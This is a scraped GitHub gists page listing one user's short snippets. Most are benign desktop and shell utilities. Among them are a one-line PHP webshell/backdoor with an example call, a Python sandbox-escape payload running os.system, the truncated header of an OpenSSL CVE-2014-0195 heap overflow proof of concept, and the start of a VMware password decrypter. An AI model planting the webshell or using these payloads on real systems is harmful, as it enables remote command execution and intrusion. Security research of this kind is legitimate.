Skip to content

Instantly share code, notes, and snippets.

takeshix takeshixx

Block or report user

Report or block takeshixx

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@takeshixx
takeshixx / leakdb.py
Created Jan 30, 2014
Small leakdb script for a $SHELL alias
View leakdb.py
#!/usr/bin/env python2
import sys,requests
DEBUG = False
try:
lines = sys.stdin.read().split('\n')
for h in lines:
if not h: continue
r = requests.get('https://api.leakdb.net/?j={}'.format(h)).json()
@takeshixx
takeshixx / shell.php
Created Apr 5, 2014
PHP webshell/backdoor
View shell.php
// Call: http://localhost/shell.php?f=system&c=id
<?@extract($_REQUEST);@die($f($c));?>
@takeshixx
takeshixx / gist:11264187
Created Apr 24, 2014
Parse jail parameters from FreeBSD /etc/rc.conf file (and all included files)
View gist:11264187
from sh import sh
dict(_.split('=',1) for _ in [_ for _ in sh('-c','\n'.join([_.strip() for _ in open('/etc/rc.conf').read().split('\n') if not _.startswith('#') and _ is not ''])+'\nset').split('\n') if _.startswith('jail_')])
View CVE-2014-0195.py
#!/usr/bin/env python2
#
# OpenSSL heap overflow PoC
# Found by ZDI - ZDI-14-173 // CVE-2014-0195
# PoC by @_hugsy_
#
# Ref: https://tools.ietf.org/html/rfc6347
#
import socket, struct
@takeshixx
takeshixx / vcops-passwords.py
Created Aug 12, 2014
VMware vCenter Operations Manager password de/encrypter
View vcops-passwords.py
#!/usr/bin/env python2
# VMware vCenter Operations Manager password de/encrypter
# author: takeshix@adversec.com
from sys import argv,exit
from base64 import b64encode,b64decode
from Crypto.Cipher import AES
class vCopsCrypt:
# AES128 wrapper class with PKCS5 padding
BLOCK_SIZE = 16
View gist:ba2b3af5226eea6b1d14
{}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os').system('id')
@takeshixx
takeshixx / 31C3
Created Dec 27, 2014
31C3 802.1x WiFi config for netctl
View 31C3
Description='31C3 802.1x WiFi'
Interface=wlp4s0
Connection=wireless
Security=wpa-configsection
IP=dhcp
WPAConfigSection=(
'ssid="31C3"'
'key_mgmt=WPA-EAP'
'eap=TTLS'
'identity="randomusername"'
@takeshixx
takeshixx / pidgin.py
Created Nov 3, 2015
Python D-Bus example for Pidgin
View pidgin.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
DEBUG = True
import dbus, gobject,re,pynotify
from dbus.mainloop.glib import DBusGMainLoop
dingregex = re.compile(r'(ding)',re.IGNORECASE)
def check_ding(account, sender, message, conv, flags):
sender = sender.encode('utf-8')
message = message.encode('utf-8')
obj = bus.get_object("im.pidgin.purple.PurpleService", "/im/pidgin/purple/PurpleObject")
@takeshixx
takeshixx / gist:7466377
Last active Dec 28, 2015
$shell (zsh,bash,etc.) search functions
View gist:7466377
# search all with wildcard
function saw(){
find / -regextype posix-extended -iregex ".*\/[^\/]*$@.*" -exec ls -lad --color {} \; 2>/dev/null
}
# search all with exact match
function sa(){
find / -regextype posix-extended -iregex ".*\/$@" -exec ls -lad --color {} \; 2>/dev/null
}
# search local with wildcard
function slw(){
@takeshixx
takeshixx / xwrap.sh
Created Nov 15, 2013
xrandr wrapper script; switch between single/extended/cloned view (e.g. configure external display/projector)
View xwrap.sh
#!/bin/zsh
# xrandr wrapper; switch between single/extended/cloned desktop;
CONFIGURED_DEVICES=($(xrandr|egrep -o '[[:alnum:]]+ [dis]{0,3}connected [0-9]{3,}x[0-9]{3,}'|awk '{print $1}'))
CONNECTED_DEVICES=($(xrandr|grep ' connected '|awk '{print $1}'))
PRIMARY=${CONFIGURED_DEVICES[1]}
RES_PRIMARY=$(xrandr|grep ${PRIMARY} -A1|tail -n1|egrep -o '[0-9]{3,}x[0-9]{3,}')
if [ ${#CONFIGURED_DEVICES[*]} -eq 1 ]; then
[ ${#CONNECTED_DEVICES[*]} -lt 2 ] && { print 'only one display conencted';exit; }
CUR_MODE='single'
You can’t perform that action at this time.